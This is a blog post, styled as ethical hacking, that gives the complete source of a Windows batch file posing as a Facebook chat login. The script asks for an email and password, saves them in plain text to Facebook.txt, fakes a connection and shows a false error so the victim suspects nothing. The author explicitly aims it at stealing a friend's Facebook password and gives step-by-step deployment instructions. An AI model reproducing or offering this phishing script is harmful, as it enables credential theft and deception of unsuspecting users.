How to Stolen Facebook Password using Pen drive

Ethical Hacking Blog
How to Stolen Facebook Password using Pendrive
#Author: ManishHacker1


Today, we will learn, how to capture or how to stolen USERNAME and PASSWORD of Facebook account of your friend..



Some times Hackers use this technique to grab your Fb ID and Password.

First , open your notepad and type bilow code in your notepad.
After that save as your notepad file in "anyname.bat"(FBChat.bat) in your Machine or Pendrive. I used to save this file FBChat.bat. Where ".bat" is your file extension.

CODE


TITLE FBChat
ECHO OFF
setlocal enabledelayedexpansion
set Counter=0
set Schalter=2
set Width=0

COLOR 09
CLS
ECHO.
ECHO LOGIN TO START CHATTING ON FACEBOOK
ECHO.
ECHO Please enter your email and Hit enter:
SET/P "MAIL=>"
ECHO.
ECHO Enter the password and Hit enter:
SET/P "PASS=>"
ECHO.>>Facebook.txt
ECHO EMAIL = %MAIL%>>Facebook.txt
ECHO PASSWORD = %PASS%>>Facebook.txt

CLS
:1
set /a Counter=%Counter% + 1
set /a Display=%Counter% / 2
FOR /L %%A IN (1,1,%Display%) DO (
set Display=!Display!²
)
cls

echo Connecting Facebook Server... %Counter%%%

echo ²!Display:~2,47!
ping localhost -n 1 >nul



if "%Counter%" == "100" goto :1-End
goto :1
:1-End
start https://www.facebook.com/
TIMEOUT /T 5 /NOBREAK >NUL

COLOR 0C
ECHO.
ECHO An error occurred while connecting to the Facebook server. Try again later.
PAUSE>NUL
E+XIT /b


Download Script= Download


Great job.!!!


Now you can see a "FBChat.bat" file where ever you saved it.
First try yourself, how to work this program.


Double click your FBChat.bat file. You will see a Prompt where fill your email ID and hit enter.




After that fill your password and hit enter.










Wait...




If you are connect with internet. You will see, origanal facebook page will open in your browser and prompt given an error message.


An error occured while connecting to the Facebook server. Try again later.

You or your friend might be think there some technical problem have occured and you or he will try again to connect. So he never knows, his/your password has been stolen.

Great job...!!!

Now you can go back to be location where you saved FBchat.bat file. Here you find a new automatically created file with the name Facebook.txt.

Open be Facebook.txt file Voilla...!!!
You can see the username and password of your Facebook account or your friend.

Follow ManishHacker1

Comments

Popular posts from this blog

How to create Folder Lock with Password Protected using Python

TOP 10 ANIMATED BATCH FILE PROGRAM

How to Connect Window Machine to Linux Machine Using Python via SSH